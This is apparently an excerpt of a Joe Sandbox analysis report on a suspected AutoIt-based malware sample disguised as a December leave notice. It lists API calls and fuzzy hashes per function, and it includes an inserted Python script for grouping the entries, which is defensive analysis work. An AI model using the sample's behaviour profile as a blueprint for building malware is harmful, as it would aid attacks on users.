                                                      • Opcode Fuzzy Hash: b8caaeb14dc1ba08275ed4d8e9caf608e42d3539aa0c6c99dd8e3701e9171ff9
                                                      • Instruction Fuzzy Hash: C20112F6900218BFE711A7D49D89EE6776CE708305F004495B785D6045EA799E844B71
                                                      APIs
                                                        • Part of subcall function 00FE3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FE2BB5,?,?), ref: 00FE3C1D
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FE2BF6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BuffCharConnectRegistryUpper
                                                      • String ID:
                                                      • API String ID: 2595220575-0
                                                      • Opcode ID: c1583c40aa87741b92d811f12e1b5cf129ca84ad09d9fbb9f08790c028d54cc5
                                                      • Instruction ID: ac11f6e83bcaa17c7882915e0448ccf4221065e0d8da357b43595a9218bb45c1
                                                      • Opcode Fuzzy Hash: c1583c40aa87741b92d811f12e1b5cf129ca84ad09d9fbb9f08790c028d54cc5
                                                      • Instruction Fuzzy Hash: E4919B31604201AFCB11EF55CC95B6EB7E9FF88320F04881DF99A97291DB39E905EB52
                                                      APIs
                                                      • select.WSOCK32 ref: 00FD9691
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00FD969E
                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00FD96C8
                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00FD96E9
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00FD96F8
                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00FD97AA
                                                      • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0101DC00), ref: 00FD9765
                                                        • Part of subcall function 00FBD2FF: _strlen.LIBCMT ref: 00FBD309
                                                      • _strlen.LIBCMT ref: 00FD9800
                                                      Similarity
                                                      • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                      • String ID:
                                                      • API String ID: 3480843537-0
                                                      • Opcode ID: acdc9c2126f44df6037e6ffb2bef51a64104938ed09c464f13869342c0bd2319
                                                      • Instruction ID: de51e9e7f78f94520894065e569b573b57783aa5281aef1f2d4c2425a143c7bf
                                                      • Opcode Fuzzy Hash: acdc9c2126f44df6037e6ffb2bef51a64104938ed09c464f13869342c0bd2319
                                                      • Instruction Fuzzy Hash: 80810032508240ABC710EFA4CC85F6BB7E9EFC4714F14462EF5559B291EB74D900EBA2
                                                      APIs
                                                      • __mtinitlocknum.LIBCMT ref: 00FAA991
                                                        • Part of subcall function 00FA7D7C: __FF_MSGBANNER.LIBCMT ref: 00FA7D91
                                                        • Part of subcall function 00FA7D7C: __NMSG_WRITE.LIBCMT ref: 00FA7D98
                                                        • Part of subcall function 00FA7D7C: __malloc_crt.LIBCMT ref: 00FA7DB8
                                                      • __lock.LIBCMT ref: 00FAA9A4
                                                      • __lock.LIBCMT ref: 00FAA9F0
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,01036DE0,00000018,00FB5E7B,?,00000000,00000109), ref: 00FAAA0C
                                                      • EnterCriticalSection.KERNEL32(8000000C,01036DE0,00000018,00FB5E7B,?,00000000,00000109), ref: 00FAAA29
                                                      • LeaveCriticalSection.KERNEL32(8000000C), ref: 00FAAA39
                                                      Similarity
                                                      • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                      • String ID:
                                                      • API String ID: 1422805418-0
                                                      • Opcode ID: 48b8712d24759db2445ac87f5fe8a6cea5fbedbe351826480b76f98970741e57
                                                      • Instruction ID: 5bdc49edd02f50e81d374c1bd761bcf7a2039ece5fbb755960d68b4b08bb8296
                                                      • Opcode Fuzzy Hash: 48b8712d24759db2445ac87f5fe8a6cea5fbedbe351826480b76f98970741e57
                                                      • Instruction Fuzzy Hash: 8B4134F1E00701DBEB209FA8DA8479CB7F0AF06334F148218E565AB2C1D77D9849DBA1
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00FE8EE4
                                                      • GetDC.USER32(00000000), ref: 00FE8EEC
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FE8EF7
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00FE8F03
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00FE8F3F
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00FE8F50
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00FEBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00FE8F8A
                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00FE8FAA
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID:
                                                      • API String ID: 3864802216-0
                                                      • Opcode ID: 8d5b0115cb8038040104df3d59e951949bb238dca37760e7fc16595e8995dc79
                                                      • Instruction ID: 59fa5cf7fdd16f1f1808faff68cfa32951b7cc3e3e20951e9edd1e9ea4e8d10d
                                                      • Opcode Fuzzy Hash: 8d5b0115cb8038040104df3d59e951949bb238dca37760e7fc16595e8995dc79
                                                      • Instruction Fuzzy Hash: 5131A072100254BFEB218F91CC49FEB3BADEF49765F044065FE48DA185CABA9842CB70
                                                      APIs
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                        • Part of subcall function 00F9C6F4: _wcscpy.LIBCMT ref: 00F9C717
                                                      • _wcstok.LIBCMT ref: 00FD184E
                                                      • _wcscpy.LIBCMT ref: 00FD18DD
                                                      • _memset.LIBCMT ref: 00FD1910
                                                      Similarity
                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                      • String ID: X
                                                      • API String ID: 774024439-3081909835
                                                      • Opcode ID: 34a82114d4f3a8f4a0153dbfdb9de8329241eb830c1c6a93efb098610883781d
                                                      • Instruction ID: f0e1944eac84f0dccbdfb865486c5f813fe82070c691dd675019f9c1b88c6d3a
                                                      • Opcode Fuzzy Hash: 34a82114d4f3a8f4a0153dbfdb9de8329241eb830c1c6a93efb098610883781d
                                                      • Instruction Fuzzy Hash: 39C17E316047419FC724EF64CC91A9AB7E5BF85350F04492EF8999B3A2DB34EC05EB82
                                                      APIs
                                                        • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
                                                      • GetSystemMetrics.USER32(0000000F), ref: 00FF016D
                                                      • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00FF038D
                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00FF03AB
                                                      • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00FF03D6
                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00FF03FF
                                                      • ShowWindow.USER32(00000003,00000000), ref: 00FF0421
                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00FF0440
                                                      Similarity
                                                      • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                      • String ID:
                                                      • API String ID: 3356174886-0
                                                      • Opcode ID: a225d41201758f287a48a1992b4edc2536002e5ee3b32231f4ef7adf4109b42a
                                                      • Instruction ID: 0ddebd0c2cc530465836050c01774103d3847d25261868cf83cf924e2a2a839f
                                                      • Opcode Fuzzy Hash: a225d41201758f287a48a1992b4edc2536002e5ee3b32231f4ef7adf4109b42a
                                                      • Instruction Fuzzy Hash: 7FA10135A0061AEFDB18CF68C9857BDBBB1FF08710F048115EE94A72A5DB35AD50EB90
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 946df47419f9b8808538f45cb5975e4d19fa58ddc5a4daf2889c60b7e14c0033
                                                      • Instruction ID: 59dcea5166be4ba27b8122042a8100471412c92cd5ee3d0c73ddfde7cd8da48b
                                                      • Opcode Fuzzy Hash: 946df47419f9b8808538f45cb5975e4d19fa58ddc5a4daf2889c60b7e14c0033
                                                      • Instruction Fuzzy Hash: 03716CB1900109EFDF15CF98CC89ABEBB78FF85314F248149F915AA251C734AA51EFA1
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FE225A
                                                      • _memset.LIBCMT ref: 00FE2323
                                                      • ShellExecuteExW.SHELL32(?), ref: 00FE2368
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                        • Part of subcall function 00F9C6F4: _wcscpy.LIBCMT ref: 00F9C717
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FE242F
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00FE243E
                                                      Similarity
                                                      • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                      • String ID: @
                                                      • API String ID: 4082843840-2766056989
                                                      • Opcode ID: 41f9614e5d110fee03496ce19e42a9755a4caebe7c399a49eb728565004fc0cc
                                                      • Instruction ID: c93a80e38f33050f474252b5247d98ea3aed1c082b05d6daa6ff155a4bbe55a8
                                                      • Opcode Fuzzy Hash: 41f9614e5d110fee03496ce19e42a9755a4caebe7c399a49eb728565004fc0cc
                                                      • Instruction Fuzzy Hash: D7719071A006199FDF15EFA5C8819AEB7F9FF48310F108059E855AB391DB38AD40EF90
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00FC3DE7
                                                      • GetKeyboardState.USER32(?), ref: 00FC3DFC
                                                      • SetKeyboardState.USER32(?), ref: 00FC3E5D
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00FC3E8B
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00FC3EAA
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00FC3EF0
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00FC3F13
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: be091d65a95f8c4a09636a4ef7308cfd0cb4483ce791f30e6e55d1b6dc288d14
                                                      • Instruction ID: c22ae257bf484c54892c27f8cdcae184c409af870e175d9590c99306cf689561
                                                      • Opcode Fuzzy Hash: be091d65a95f8c4a09636a4ef7308cfd0cb4483ce791f30e6e55d1b6dc288d14
                                                      • Instruction Fuzzy Hash: 4651E5A0E047D63DFB3A43648D47FB67EA55B06354F08888CE0D5568C2D3A9AEC8E760
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 00FC3C02
                                                      • GetKeyboardState.USER32(?), ref: 00FC3C17
                                                      • SetKeyboardState.USER32(?), ref: 00FC3C78
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00FC3CA4
                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00FC3CC1
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00FC3D05
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00FC3D26
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 3d40a0992d161fcc7cf291f052f6e06486daa936aab7cd26cffbffc6fccadaf4
                                                      • Instruction ID: 600cc58e92618d1a678e9a26dca7960fb22e9009291216b83aecb355f5b36089
                                                      • Opcode Fuzzy Hash: 3d40a0992d161fcc7cf291f052f6e06486daa936aab7cd26cffbffc6fccadaf4
                                                      • Instruction Fuzzy Hash: E851D3A09047D63DFB3283648D57FBABEA96B06354F08C48CE0D6564C2D695EE84F760
                                                      Similarity
                                                      • API ID: _wcsncpy$LocalTime
                                                      • String ID:
                                                      • API String ID: 2945705084-0
                                                      • Opcode ID: a4cd4eef292f214053b57c185da1d40a70e7192c5f751db03ac3f2da7d7c8a48
                                                      • Instruction ID: 9e63e6100cc1461c0b3179fba76060bf893fcceeb38e699fb46017d9cd91a199
                                                      • Opcode Fuzzy Hash: a4cd4eef292f214053b57c185da1d40a70e7192c5f751db03ac3f2da7d7c8a48
                                                      • Instruction Fuzzy Hash: F34153A6D1431576DF10EBF4CC86ACFB7ACAF06310F50896AE514E3121FA38D614D7A5
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00FE3DA1
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FE3DCB
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00FE3E80
                                                        • Part of subcall function 00FE3D72: RegCloseKey.ADVAPI32(?), ref: 00FE3DE8
                                                        • Part of subcall function 00FE3D72: FreeLibrary.KERNEL32(?), ref: 00FE3E3A
                                                        • Part of subcall function 00FE3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00FE3E5D
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00FE3E25
                                                      Similarity
                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                      • String ID:
                                                      • API String ID: 395352322-0
                                                      • Opcode ID: 6f9d5931dabde51929f80b100db496e9c66d22725e2e68f8127c347fdc6586ea
                                                      • Instruction ID: ba4c42f894c8a53e04839ea3ff57a0a2e12a0de3467ae2132b71658829b52aa9
                                                      • Opcode Fuzzy Hash: 6f9d5931dabde51929f80b100db496e9c66d22725e2e68f8127c347fdc6586ea
                                                      • Instruction Fuzzy Hash: D931BBB1D01149BFDB15DBD5DC8DAFFB7BCEB08350F000169A552A3140DA759F89AB60
                                                      APIs
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00FE8FE7
                                                      • GetWindowLongW.USER32(0185EA18,000000F0), ref: 00FE901A
                                                      • GetWindowLongW.USER32(0185EA18,000000F0), ref: 00FE904F
                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00FE9081
                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00FE90AB
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00FE90BC
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00FE90D6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID:
                                                      • API String ID: 2178440468-0
                                                      • Opcode ID: 841388718979c0486fef4482929e14ec5a77f1d61a5417ce276cb1f9dbe65c03
                                                      • Instruction ID: f7449a4cd1d643ada1bd4c2189ac2ace9bd0d8310af7d02cc80c5eb00c472d9c
                                                      • Opcode Fuzzy Hash: 841388718979c0486fef4482929e14ec5a77f1d61a5417ce276cb1f9dbe65c03
                                                      • Instruction Fuzzy Hash: 37315BB4A08254DFDB31CFA9DC84F5437A5FB49324F140164F6598B2A6CBB6A840EB60
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FC08F2
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FC0918
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00FC091B
                                                      • SysAllocString.OLEAUT32(?), ref: 00FC0939
                                                      • SysFreeString.OLEAUT32(?), ref: 00FC0942
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00FC0967
                                                      • SysAllocString.OLEAUT32(?), ref: 00FC0975
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: d63be472108091c29392eec8bc3e92aceb56fa3ae8f8dc9a0c8960f08472c3a1
                                                      • Instruction ID: 4d6ecd442e2d03dc3d04e44aa093529457bba549099900d9a52fd0ff74105080
                                                      • Opcode Fuzzy Hash: d63be472108091c29392eec8bc3e92aceb56fa3ae8f8dc9a0c8960f08472c3a1
                                                      • Instruction Fuzzy Hash: FB21A67660020AAFAF109FA8CD89FBB73ECEB08370B408125F945DB255DA74EC469760
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                      • API String ID: 1038674560-2734436370
                                                      • Opcode ID: bee7524ec73c130ecc982351981e0a2e863d07809692357dd3531f48a1405747
                                                      • Instruction ID: f367ee32e315e521d61b2b3e10e7d3e7608de7f483066a00e0272e7f7cfc95ed
                                                      • Opcode Fuzzy Hash: bee7524ec73c130ecc982351981e0a2e863d07809692357dd3531f48a1405747
                                                      • Instruction Fuzzy Hash: 3A21797260021267D724FA349E03FBB739CEF65320F54842DF44697046EB699942F3A0
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FC09CB
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FC09F1
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00FC09F4
                                                      • SysAllocString.OLEAUT32 ref: 00FC0A15
                                                      • SysFreeString.OLEAUT32 ref: 00FC0A1E
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00FC0A38
                                                      • SysAllocString.OLEAUT32(?), ref: 00FC0A46
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: b4656c39aec6a403b0a984bcea9c7bac1519b3aaf579a1a2d19e74bb5b7c4dad
                                                      • Instruction ID: 5a511fbb5f1a0a5c45076c2059b6b1664fefec2cb248d8df9e21aa6cce1724bb
                                                      • Opcode Fuzzy Hash: b4656c39aec6a403b0a984bcea9c7bac1519b3aaf579a1a2d19e74bb5b7c4dad
                                                      • Instruction Fuzzy Hash: 4F217475600205AFDB10DFE8DD89EAA77ECEF08370B408129F949CB265DE78EC469764
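Each entry above pairs a function's API call list with an API String ID and with opcode and instruction fuzzy hashes; the two SysAllocString/StringFromGUID2 functions, for instance, share API String ID 3761583154-0 while their Opcode IDs differ, and the `__wcsnicmp` function carries the AutoIt directive strings that back the "compiled AutoIt script" verdict. The script below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it parses entries of this shape, groups functions by API String ID to surface same-profile/different-code pairs, and flags entries whose String ID holds AutoIt directives. The sample text embedded in it is constructed from the layout of the entries on this page, trimmed to the fields the parser reads.

```python
"""Parse Joe Sandbox per-function entries (the "APIs" / "Similarity" blocks)
and group them by API String ID.  Added example, not from the Joe Sandbox
report; SAMPLE is constructed from the page's entry layout and trimmed."""
import re
from collections import defaultdict

# Constructed sample: three entries in the report's own layout.
SAMPLE = """\
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FC08F2
• SysAllocString.OLEAUT32(00000000), ref: 00FC091B
• StringFromGUID2.OLE32(?,?,00000028), ref: 00FC0967
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: d63be472108091c29392eec8bc3e92aceb56fa3ae8f8dc9a0c8960f08472c3a1
• Instruction Fuzzy Hash: FB21A67660020AAFAF109FA8CD89FBB73ECEB08370B408125F945DB255DA74EC469760
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: bee7524ec73c130ecc982351981e0a2e863d07809692357dd3531f48a1405747
• Instruction Fuzzy Hash: 3A21797260021267D724FA349E03FBB739CEF65320F54842DF44697046EB699942F3A0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FC09CB
• SysAllocString.OLEAUT32 ref: 00FC0A15
• StringFromGUID2.OLE32(?,?,00000028), ref: 00FC0A38
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: b4656c39aec6a403b0a984bcea9c7bac1519b3aaf579a1a2d19e74bb5b7c4dad
• Instruction Fuzzy Hash: 4F217475600205AFDB10DFE8DD89EAA77ECEF08370B408129F949CB265DE78EC469764
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
# "• Name.MODULE(args), ref: addr" or "• Name.MODULE ref: addr"; subcall lines
# carry a "Part of subcall function XXXXXXXX:" prefix. Ordinal imports look
# like "#16.WSOCK32", which the api group accepts.
API_LINE = re.compile(
    r"^•\s+(?:Part of subcall function [0-9A-Fa-f]+:\s+)?"
    r"(?P<api>[^.\s]+)\.(?P<mod>[A-Za-z0-9]+)")
FIELD_LINE = re.compile(
    r"^•\s+(API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(.*)$")
# Directives AutoIt keeps as literal strings in the compiled interpreter.
AUTOIT_DIRECTIVES = {"#requireadmin", "#notrayicon", "#onautoitstartregister"}


def parse_entries(text):
    """Split report text into entries; each entry opens with an 'APIs' header."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            if line == "APIs":
                cur = {"apis": [], "fields": {}}
                entries.append(cur)
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        if section == "APIs":
            m = API_LINE.match(line)
            if m:
                cur["apis"].append(f"{m.group('api')}.{m.group('mod')}")
        elif section == "Similarity":
            m = FIELD_LINE.match(line)
            if m:
                cur["fields"][m.group(1)] = m.group(2).strip()
    return entries


def group_by_api_string_id(entries):
    groups = defaultdict(list)
    for e in entries:
        key = e["fields"].get("API String ID")
        if key:
            groups[key].append(e)
    return groups


def shared_profile_distinct_code(entries):
    """API String IDs used by several functions whose Opcode IDs differ:
    same API profile, different code (candidates for manual diffing)."""
    out = {}
    for key, members in group_by_api_string_id(entries).items():
        opcodes = {m["fields"].get("Opcode ID") for m in members}
        if len(members) > 1 and len(opcodes) > 1:
            out[key] = sorted(opcodes)
    return out


def autoit_directive_hits(entries):
    """(Opcode ID, [directives]) for entries whose String ID holds AutoIt directives."""
    hits = []
    for e in entries:
        strings = e["fields"].get("String ID", "").split("$")
        found = [s for s in strings if s.lower() in AUTOIT_DIRECTIVES]
        if found:
            hits.append((e["fields"].get("Opcode ID"), found))
    return hits


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    print("functions:", len(parsed))
    print("same API profile, different opcode:", shared_profile_distinct_code(parsed))
    print("AutoIt directive strings:", autoit_directive_hits(parsed))
```

Run it against the full report text instead of SAMPLE to get the same grouping over every function; the API String ID is the coarse key, and the opcode and instruction fuzzy hashes are what you compare once a group looks interesting.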
                                                      APIs
                                                        • Part of subcall function 00F9D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F9D1BA
                                                        • Part of subcall function 00F9D17C: GetStockObject.GDI32(00000011), ref: 00F9D1CE
                                                        • Part of subcall function 00F9D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9D1D8
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00FEA32D
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00FEA33A
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00FEA345
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00FEA354
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00FEA360
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: e9b34a343d21c3626b20252d13e9133ceb680767e8b8f7110eabf75a775b7635
                                                      • Instruction ID: b443ce1ba14e230e382632c0659dfdc8a506dc33964b1cd169c793dcb4fa7509
                                                      • Opcode Fuzzy Hash: e9b34a343d21c3626b20252d13e9133ceb680767e8b8f7110eabf75a775b7635
                                                      • Instruction Fuzzy Hash: 5711D0B2500219BEEF214FA1CC85EEB7F6DFF08398F014115BA08A6060C676AC21DBA4
                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 00F9CCF6
                                                      • GetWindowRect.USER32(?,?), ref: 00F9CD37
                                                      • ScreenToClient.USER32(?,?), ref: 00F9CD5F
                                                      • GetClientRect.USER32(?,?), ref: 00F9CE8C
                                                      • GetWindowRect.USER32(?,?), ref: 00F9CEA5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
